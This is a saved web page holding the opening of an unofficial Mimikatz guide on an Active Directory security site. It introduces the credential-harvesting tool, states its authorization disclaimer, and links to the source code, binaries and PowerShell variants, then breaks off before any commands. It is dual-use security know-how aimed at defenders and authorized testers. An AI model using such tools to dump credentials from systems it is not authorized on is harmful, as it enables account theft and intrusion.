
<!DOCTYPE html><!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Mimikatz &#8211; Active Directory Security</title> <meta name='robots' content='max-image-preview:large' /> <link rel="alternate" type="application/rss+xml" title="Active Directory Security &raquo; Feed" href="https://adsecurity.org/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="Active Directory Security &raquo; Comments Feed" href="https://adsecurity.org/?feed=comments-rss2" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/adsecurity.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}}; /*! 
This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof 
URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://adsecurity.org/wp-includes/css/dist/block-library/style.min.css?ver=6.5.5' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! 
This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: 
linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 14px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 20px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--tiny: 10px;--wp--preset--font-size--regular: 16px;--wp--preset--font-size--larger: 26px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) 
!important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) 
!important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: 
var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} .wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} .wp-block-pullquote{font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='bootstrap-css' href='https://adsecurity.org/wp-content/themes/graphene/bootstrap/css/bootstrap.min.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://adsecurity.org/wp-content/themes/graphene/fonts/font-awesome/css/font-awesome.min.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='graphene-css' href='https://adsecurity.org/wp-content/themes/graphene/style.css?ver=2.8.4' 
type='text/css' media='screen' /> <link rel='stylesheet' id='graphene-responsive-css' href='https://adsecurity.org/wp-content/themes/graphene/responsive.css?ver=2.8.4' type='text/css' media='all' /> <link rel='stylesheet' id='graphene-blocks-css' href='https://adsecurity.org/wp-content/themes/graphene/blocks.css?ver=2.8.4' type='text/css' media='all' /> <script type="text/javascript" src="https://adsecurity.org/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://adsecurity.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/bootstrap/js/bootstrap.min.js?ver=2.8.4" id="bootstrap-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/bootstrap-hover-dropdown/bootstrap-hover-dropdown.min.js?ver=2.8.4" id="bootstrap-hover-dropdown-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/bootstrap-submenu/bootstrap-submenu.min.js?ver=2.8.4" id="bootstrap-submenu-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/jquery.infinitescroll.min.js?ver=2.8.4" id="infinite-scroll-js"></script> <script type="text/javascript" id="graphene-js-extra"> /* <![CDATA[ */ var grapheneJS = {"siteurl":"https:\/\/adsecurity.org","ajaxurl":"https:\/\/adsecurity.org\/wp-admin\/admin-ajax.php","templateUrl":"https:\/\/adsecurity.org\/wp-content\/themes\/graphene","isSingular":"1","enableStickyMenu":"","shouldShowComments":"1","commentsOrder":"newest","sliderDisable":"","sliderInterval":"7000","infScrollBtnLbl":"Load more","infScrollOn":"","infScrollCommentsOn":"","totalPosts":"1","postsPerPage":"10","isPageNavi":"","infScrollMsgText":"Fetching window.grapheneInfScrollItemsPerPage of window.grapheneInfScrollItemsLeft items left 
...","infScrollMsgTextPlural":"Fetching window.grapheneInfScrollItemsPerPage of window.grapheneInfScrollItemsLeft items left ...","infScrollFinishedText":"All loaded!","commentsPerPage":"50","totalComments":"0","infScrollCommentsMsg":"Fetching window.grapheneInfScrollCommentsPerPage of window.grapheneInfScrollCommentsLeft comments left ...","infScrollCommentsMsgPlural":"Fetching window.grapheneInfScrollCommentsPerPage of window.grapheneInfScrollCommentsLeft comments left ...","infScrollCommentsFinishedMsg":"All comments loaded!","disableLiveSearch":"1","txtNoResult":"No result found.","isMasonry":""}; /* ]]> */ </script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/graphene.js?ver=2.8.4" id="graphene-js"></script> <script type="text/javascript" id="wpstg-global-js-extra"> /* <![CDATA[ */ var wpstg = {"nonce":"23dea5be61"}; /* ]]> */ </script> <script type="text/javascript" src="https://adsecurity.org/wp-content/plugins/wp-staging-pro/assets/js/dist/wpstg-blank-loader.min.js?ver=6.5.5" id="wpstg-global-js"></script> <link rel="https://api.w.org/" href="https://adsecurity.org/index.php?rest_route=/" /><link rel="alternate" type="application/json" href="https://adsecurity.org/index.php?rest_route=/wp/v2/pages/1821" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://adsecurity.org/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.5.5" /> <link rel="canonical" href="https://adsecurity.org/?page_id=1821" /> <link rel='shortlink' href='https://adsecurity.org/?p=1821' /> <link rel="alternate" type="application/json+oembed" href="https://adsecurity.org/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=https%3A%2F%2Fadsecurity.org%2F%3Fpage_id%3D1821" /> <link rel="alternate" type="text/xml+oembed" href="https://adsecurity.org/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=https%3A%2F%2Fadsecurity.org%2F%3Fpage_id%3D1821&#038;format=xml" /> <script> WebFontConfig = { google: { 
families: ["Lato:400,400i,700,700i&display=swap"] } }; (function(d) { var wf = d.createElement('script'), s = d.scripts[0]; wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'; wf.async = true; s.parentNode.insertBefore(wf, s); })(document); </script> <style type="text/css"> .header_title, .header_title a, .header_title a:visited, .header_title a:hover, .header_desc {color:#000000}.carousel, .carousel .item{height:400px}@media (max-width: 991px) {.carousel, .carousel .item{height:250px}}#header{max-height:198px}@media (min-width: 1200px) {.container {width:1280px}} </style> <script type="application/ld+json">{"@context":"http:\/\/schema.org","@type":"WebPage","mainEntityOfPage":"https:\/\/adsecurity.org\/?page_id=1821","publisher":{"@type":"Organization","name":"Active Directory Security"},"headline":"Mimikatz","datePublished":"2015-09-20T09:00:15+00:00","dateModified":"2018-02-17T15:10:25+00:00","description":"Unofficial Guide to Mimikatz &amp; Command Reference Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017 Page last updated: February 17th, 2018 Introduction: It seems like many people on both sides of the fence, Red &amp; Blue, aren't familiar with most of Mimikatz's capabilities, so I put together this information on all ...","author":{"@type":"Person","name":"Sean Metcalf"},"image":["https:\/\/adsecurity.org\/wp-content\/uploads\/2017\/11\/Mimikatz-DPAPI-Protect.png","https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-Trust.png","https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-Secrets.png"]}</script> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><meta property="og:type" content="article" /> <meta property="og:title" content="Mimikatz" /> <meta property="og:url" content="https://adsecurity.org/?page_id=1821" /> <meta property="og:site_name" content="Active Directory Security" /> <meta 
property="og:description" content="Unofficial Guide to Mimikatz &amp; Command Reference Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017 Page last updated: February 17th, 2018 Introduction: It seems like many people on both sides of the fence, Red &amp; Blue, aren&#039;t familiar with most of Mimikatz&#039;s capabilities, so I put together this information on all ..." /> <meta property="og:updated_time" content="2018-02-17T15:10:25+00:00" /> <meta property="article:modified_time" content="2018-02-17T15:10:25+00:00" /> <meta property="article:published_time" content="2015-09-20T09:00:15+00:00" /> <meta property="og:image" content="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push.jpg" /> <meta property="og:image:width" content="1186" /> <meta property="og:image:height" content="630" /> </head> <body class="page-template-default page page-id-1821 custom-background wp-embed-responsive layout-boxed two_col_left two-columns singular"> <div class="container boxed-wrapper"> <div id="top-bar" class="row clearfix top-bar "> <div class="col-md-12 top-bar-items"> <ul class="social-profiles"> <li class="social-profile social-profile-rss"> <a href="https://adsecurity.org/?feed=rss2" title="Subscribe to Tech, News, and Other Ideations&#039;s RSS feed" id="social-id-1" class="mysocial social-rss"> <i class="fa fa-rss"></i> </a> </li> </ul> <button type="button" class="search-toggle navbar-toggle collapsed" data-toggle="collapse" data-target="#top_search"> <span class="sr-only">Toggle search form</span> <i class="fa fa-search-plus"></i> </button> <div id="top_search" class="top-search-form"> <form class="searchform" method="get" action="https://adsecurity.org"> <div class="input-group"> <div class="form-group live-search-input"> <label for="s" class="screen-reader-text">Search for:</label> <input type="text" id="s" name="s" class="form-control" placeholder="Search"> </div> <span class="input-group-btn"> <button class="btn btn-default" 
type="submit"><i class="fa fa-search"></i></button> </span> </div> </form> </div> </div> </div> <div id="header" class="row"> <img src="https://adsecurity.org/wp-content/themes/graphene/images/headers/fluid.jpg" alt="Active Directory Security" title="Active Directory Security" width="960" height="198" /> </div> <nav class="navbar row navbar-inverse"> <div class="navbar-header align-center"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#header-menu-wrap, #secondary-menu-wrap"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <p class="header_title"> <a href="https://adsecurity.org" title="Go back to the front page"> Active Directory Security </a> </p> <p class="header_desc">Active Directory &amp; Enterprise Security, Methods to Secure Active Directory, Attack Methods &amp; Effective Defenses, PowerShell, Tech Notes, &amp; Geek Trivia&#8230;</p> </div> <div class="collapse navbar-collapse" id="header-menu-wrap"> <ul class="nav navbar-nav flip"><li ><a href="https://adsecurity.org/">Home</a></li><li class="menu-item menu-item-8"><a href="https://adsecurity.org/?page_id=8" >About</a></li><li class="menu-item menu-item-41"><a href="https://adsecurity.org/?page_id=41" >AD Resources</a></li><li class="menu-item menu-item-4031"><a href="https://adsecurity.org/?page_id=4031" >Attack Defense &#038; Detection</a></li><li class="menu-item menu-item-293"><a href="https://adsecurity.org/?page_id=293" >Contact</a></li><li class="menu-item menu-item-1821 current-menu-item"><a href="https://adsecurity.org/?page_id=1821" >Mimikatz</a></li><li class="menu-item menu-item-1352"><a href="https://adsecurity.org/?page_id=1352" >Presentations</a></li><li class="menu-item menu-item-195"><a href="https://adsecurity.org/?page_id=195" >Schema Versions</a></li><li class="menu-item menu-item-399"><a href="https://adsecurity.org/?page_id=399" >Security 
Resources</a></li><li class="menu-item menu-item-183"><a href="https://adsecurity.org/?page_id=183" >SPNs</a></li><li class="menu-item menu-item-2532"><a href="https://adsecurity.org/?page_id=2532" >Top Posts</a></li></ul> </div> </nav> <div id="content" class="clearfix hfeed row"> <div id="content-main" class="clearfix content-main col-md-8"> <div id="post-1821" class="clearfix post post-1821 page type-page status-publish hentry nodate item-wrap"> <div class="entry clearfix"> <h1 class="post-title entry-title"> Mimikatz </h1> <div class="entry-content clearfix"> <h1><span style="text-decoration: underline;"><strong>Unofficial Guide to Mimikatz &amp; Command Reference</strong></span></h1> <h5><img fetchpriority="high" decoding="async" class="alignnone wp-image-3815" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28.png" alt="" width="607" height="149" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28.png 1140w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28-300x73.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28-768x188.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28-1024x251.png 1024w" sizes="(max-width: 607px) 100vw, 607px" /></h5> <h5>Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017<br /> <em>Page last updated: February 17th, 2018</em></h5> <h3><span style="text-decoration: underline;"><strong>Introduction:</strong></span></h3> <p>It seems like many people on both sides of the fence, Red &amp; Blue, aren&#8217;t familiar with most of Mimikatz&#8217;s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. 
This way both Red &amp; Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect.</p> <p>I developed this reference after speaking with a lot of people hired to both defend and attack networks; I learned that outside of a few of the most frequently used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required &amp; optional), as well as screenshots and additional context (where possible). There are several I haven&#8217;t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible. With that noted, <em>this page will never be as up-to-date as the <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz GitHub</a>. The best Mimikatz documentation is the source code.</em></p> <p><em>This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don&#8217;t own or have not been allowed/approved to use. In other words, don&#8217;t pen-test/red-team systems with Mimikatz without a &#8220;get out of jail free card&#8221;.</em></p> <p>This page and all content contained within is not to be reproduced in whole or part without <a href="https://adsecurity.org/?page_id=293">express written consent by this page&#8217;s author</a>.<br /> I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his Twitter, blog &amp; GitHub pages, and my own work/research.<br /> Any errors on this page are my own only. 
<a href="https://adsecurity.org/?page_id=293">Send comments/kudos here.</a></p> <p>Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially <a href="https://adsecurity.org/?p=1535">Windows 10</a>.</p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Mimikatz Overview:</strong></span></h3> <p>Mimikatz is one of the best tools to gather credential data from Windows systems. In fact, I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French, most of the resources describing Mimikatz usage are in French, at least on <a href="http://blog.gentilkiwi.com/">his blog</a>. The <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz GitHub repository</a> is in English and includes useful information on command usage.</p> <p>Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features: <em>mimidrv</em> (a driver to interact with the Windows kernel) and <em>mimilib</em> (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). 
The Mimikatz.exe contains, or at least should contain, all capability noted above.</p> <p>Mimikatz capability can be leveraged by <a href="https://github.com/gentilkiwi/mimikatz">compiling and running your own version</a>, running the <a href="https://github.com/gentilkiwi/mimikatz/releases">Mimikatz executable</a>, leveraging the <a href="https://www.offensive-security.com/metasploit-unleashed/mimikatz/">MetaSploit script</a>, the <a href="https://github.com/PowerShellMafia/PowerSploit">official Invoke-Mimikatz PowerShell version</a>, or one of the dozens of Mimikatz PowerShell variants (I happen to be partial to <a href="https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1">PowerShell Empire</a>, because Empire is awesome!).</p> <p>The Mimikatz source code and release binaries are available on GitHub and are licensed under Creative Commons with the following detail:<br /> <em>You are free to:</em><br /> <em> *  Share — copy and redistribute the material in any medium or format</em><br /> <em> *  Adapt — remix, transform, and build upon the material</em><br /> <em> *  for any purpose, even commercially.</em><br /> <em> The licensor cannot revoke these freedoms as long as you follow the license terms.</em><br /> <em> Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. 
You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.</em><br /> <em> No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.</em></p> <h4><strong><span style="text-decoration: underline;">Mimikatz Author(s):</span></strong></h4> <ul> <li>Benjamin DELPY <code>gentilkiwi</code>, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )</li> <li>The DCSync function in the <code>lsadump</code> module was co-written with Vincent LE TOUX; you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( <a href="http://www.mysmartlogon.com">http://www.mysmartlogon.com</a> )</li> </ul> <h4><strong><span style="text-decoration: underline;"><br /> &#8220;Official&#8221; Mimikatz Links:</span></strong></h4> <p><a href="https://github.com/gentilkiwi/mimikatz">Mimikatz GitHub Location</a> (Source Code)</p> <p><a href="https://github.com/gentilkiwi/mimikatz/releases">Mimikatz Releases</a> (includes binaries)</p> <p><a href="https://github.com/gentilkiwi/mimikatz/wiki">Mimikatz GitHub Wiki</a> (Documentation, some of which is reproduced here)</p> <p><a href="http://blog.gentilkiwi.com/mimikatz">GentilKiwi Blog</a> (much of it is in French, use Chrome/other for translation)</p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Mimikatz &amp; Credentials:</strong></span></h3> <p>After a user logs on, a variety of credentials are generated and stored in memory in the Local Security Authority Subsystem Service (<a 